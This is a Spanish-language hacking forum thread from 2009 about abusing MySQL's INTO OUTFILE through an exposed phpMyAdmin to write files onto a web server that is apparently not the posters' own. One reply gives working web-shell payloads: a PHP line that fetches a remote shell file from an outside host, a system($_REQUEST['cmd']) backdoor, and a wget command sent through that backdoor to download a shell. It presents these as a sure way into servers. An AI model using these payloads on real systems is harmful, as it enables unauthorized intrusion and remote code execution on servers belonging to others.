|
Título: Un buen uso de INTO OUTFILE Publicado por: HardieVon en 6 Marzo 2009, 02:17 am Hola que tal encontre un servidor con phpmyadmin y entre tantas pruebas de codigo como.
<? system(... <? eval(.... me decidi en fabricar una pequeña herramientilla. utilizando la instruccion OUTFILE... Código y con el codigo php. Código ahora concluimos con este codigo y podremos editar archivos en el servidor... Código
el nombre del fichero se pasa por una variable GET llamada "f". de la forma editor.php?f=index.php Saludos de perro Título: Re: Un buen uso de INTO OUTFILE Publicado por: OzX en 6 Marzo 2009, 02:48 am hi brota¡
Into Outfile. siempre sirve. cuando tienes magic quotes off, privilegios en el usuario , y el document root, y una carpeta con permisos. Con esas 4 cosas, tienes Ya Seguro el Ingreso a un Servidor. Y en este Post: http://foro.undersecurity.net/read.php?15,772 E Posteado varias Formas de Obtener Privilegios Mediante esta tecnica. Por ej En el Source a Insertar. Ingresar. Código: <? file_put_contents('shell.php',file_get_contents('http://www.ruta.com/shell.txt'));?>En el Caso que no Tenga file_get_conetents, habilitado se puede hacer lo siguiente Código: <? system($_REQUEST['cmd']); ?> y Luego con Wget Código: wget -c --output-document=shell.php www.script.com/shell.txt Asi Kedaria Código: http://www.pagina.com/file/c.php?cmd=wget -c --output-document=shell.php www.script.com/shell.txt Y Vuala ¡ (http://i41.tinypic.com/dc91t0.png) Saludos¡ Título: Re: Un buen uso de INTO OUTFILE Publicado por: HardieVon en 6 Marzo 2009, 05:00 am Si lo que pasa es que con esa tecnica.. existen archivos que superan el tiempo de ejecucion... por que el file_get, supera en algunos casos...colosales tamaños como la c99 y tambien existen algunos server sin consola...
Saludos de perro Título: Re: Un buen uso de INTO OUTFILE Publicado por: OzX en 8 Marzo 2009, 20:15 pm Citar tambien existen algunos server sin consola Como?:huh: |